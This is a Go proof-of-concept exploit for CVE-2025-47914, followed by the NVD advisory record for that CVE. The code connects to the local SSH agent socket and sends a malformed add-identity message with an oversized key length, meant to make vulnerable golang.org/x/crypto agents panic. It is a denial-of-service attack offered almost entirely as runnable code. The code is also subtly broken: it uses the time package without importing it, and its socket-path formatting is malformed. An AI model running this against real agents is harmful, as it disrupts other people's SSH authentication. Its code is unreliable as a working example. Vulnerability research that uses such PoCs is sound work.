CVE-2025-47914

// CVE-2025-47914 PoC - Malformed SSH Agent Identity Request // This PoC demonstrates sending a malformed identity request to trigger panic package main import ( "bytes" "encoding/binary" "fmt" "net" "os" "os/user" "path/filepath" ) const SSH_AGENTC_ADD_IDENTITY = 17 func buildMalformedIdentityRequest() []byte { var buf bytes.Buffer // Message type buf.WriteByte(SSH_AGENTC_ADD_IDENTITY) // Protocol string length - valid value binary.Write(&buf, binary.BigEndian, uint32(7)) buf.WriteString("ssh-rsa") // RSA public key blob with oversized length // This causes out of bounds read oversizedLen := uint32(0x7FFFFFFF) binary.Write(&buf, binary.BigEndian, oversizedLen) // Comment field binary.Write(&buf, binary.BigEndian, uint32(4)) buf.WriteString("test") return buf.Bytes() } func getSSHAgentSocket() string { if sock := os.Getenv("SSH_AUTH_SOCK"); sock != "" { return sock } usr, _ := user.Current() defaultSock := filepath.Join(os.TempDir(), fmt.Sprintf("ssh-%%C/agent.%s", usr.Uid)) // Try common SSH agent socket patterns for i := 0; i < 10; i++ { sockPath := fmt.Sprintf(defaultSock, i) if _, err := os.Stat(sockPath); err == nil { return sockPath } } return "" } func main() { sockPath := getSSHAgentSocket() if sockPath == "" { fmt.Println("SSH Agent socket not found") os.Exit(1) } fmt.Printf("Connecting to SSH Agent: %s\n", sockPath) conn, err := net.Dial("unix", sockPath) if err != nil { fmt.Printf("Failed to connect: %v\n", err) os.Exit(1) } defer conn.Close() payload := buildMalformedIdentityRequest() // Send length-prefixed message lenBuf := make([]byte, 4) binary.BigEndian.PutUint32(lenBuf, uint32(len(payload))) _, err = conn.Write(lenBuf) if err != nil { fmt.Printf("Failed to send length: %v\n", err) os.Exit(1) } _, err = conn.Write(payload) if err != nil { fmt.Printf("Failed to send payload: %v\n", err) os.Exit(1) } fmt.Println("Malformed request sent. If vulnerable, SSH Agent may panic.") // Read response (may fail if agent panicked) response := make([]byte, 1024) conn.SetReadDeadline(time.Now().Add(2 * time.Second)) n, err := conn.Read(response) if err != nil { fmt.Printf("Agent response error (may have panicked): %v\n", err) } else { fmt.Printf("Response: %x\n", response[:n]) } }

{"cve": {"id": "CVE-2025-47914", "sourceIdentifier": "[email protected]", "published": "2025-11-19T21:15:50.517", "lastModified": "2025-12-11T19:36:41.373", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SSH Agent servers do not validate the size of messages when processing new identity requests, which may cause the program to panic if the message is malformed due to an out of bounds read."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:golang:crypto:*:*:*:*:*:go:*:*", "versionEndExcluding": "0.45.0", "matchCriteriaId": "0DB7D01D-5361-40FC-83A9-91A601A0321D"}]}]}], "references": [{"url": "https://go.dev/cl/721960", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://go.dev/issue/76364", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://groups.google.com/g/golang-announce/c/w-oX3UxNcZA", "source": "[email protected]", "tags": ["Mailing List"]}, {"url": "https://pkg.go.dev/vuln/GO-2025-4135", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}